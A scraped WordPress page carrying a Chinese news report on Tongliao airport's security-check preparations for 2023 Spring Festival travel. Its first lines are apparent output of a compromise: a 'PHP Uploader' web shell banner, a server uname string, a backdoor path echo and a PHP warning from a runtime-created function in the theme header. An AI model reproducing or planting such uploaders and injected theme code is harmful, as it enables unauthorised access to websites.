PHP Uploader - By Phenix-TN & Mr.Anderson
Linux iZwz91hdhujjzqy9icuvwuZ 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
okokok/www/wwwroot/aircn/new_wordpress/wordpressokokok
Warning: Use of undefined constant itongtong - assumed 'itongtong' (this will throw an Error in a future version of PHP) in /www/wwwroot/aircn/new_wordpress/wordpress/wp-content/themes/newsbulk/header.php(29) : runtime-created function on line 1

2023年春运即将来临,为切实做好春运期间旅客出行保障工作,提升通辽机场安检工作质量和服务保障能力。通辽机场安检护卫部从人员资质、安全教育、设施设备、现场管理等方面,多措并举做好春运保障准备工作。

排查人员资质,确保依法合规。为做好春运期间安检各岗位人员勤务安排工作,确保人员在岗在位依法合规。安检护卫部分别对旅检、行检、货检及控制区道口安检通道在岗在位的人员资质进行了排查。排查按照职业技能鉴定资质、人身和X射线机操作岗位重点岗位资质、基础岗位认证资质以及岗前培训、考核情况进行,确保安检在岗在位人员符合资质上岗,按照操作流程执勤,全面提高安全检查质量。

加强安全教育,紧盯队伍管理。为强化安检队伍管理,提升安检队伍的执行力和凝聚力,通辽机场组织员工开展内部谈话,深入了解员工思想动态、工作情况及生活状态,确保安检队伍思想稳定;二是通过早例会、周例会、部门例会等多种形式,开展员工纪律作风和安全教育工作,引导员工严守思想防线和底线,防范员工出现违规违纪等情况,确保安检队伍的稳定。

设施设备自查,确保运行状态。为做好春运保障工作,安检护卫部开展X射线机、金属探测门、手持金属探测器、爆炸物探测仪、监控系统、安全信息系统等安检设施设备自查;重点检查UPS、金属探测门各项参数、X射线机以及安全信息管理系统的运行情况;结合自查情况,认真评估在用安检设施设备存在的运行风险,并提出有效解决措施,确保设施设备的安全运行。

强化现场管理,筑牢安全防线。为做好安检现场各项安全工作,提升安检现场管理水平,安检护卫部紧抓内部质控和培训工作,要求春运期间加强质量控制监察、岗位测试、应急演练工作,做好安检现场的常态化监管。二是组织员工开展危险品、违禁物品学习和培训工作,提高员工对违禁物品的识别能力和处置能力,为做好春运期间安全保障工作提供有利的保障。

下一步,通辽机场将切实做好春运期间勤务安排、岗位保障、应急处置等安全工作;不断夯实安检运行保障工作,持续提升安检保障能力和服务水平,为2023年春运各项安全保障工作做好充足的准备。

来源:中国民航网,通讯员:杨晓辉 报道

作者 一潼

发表回复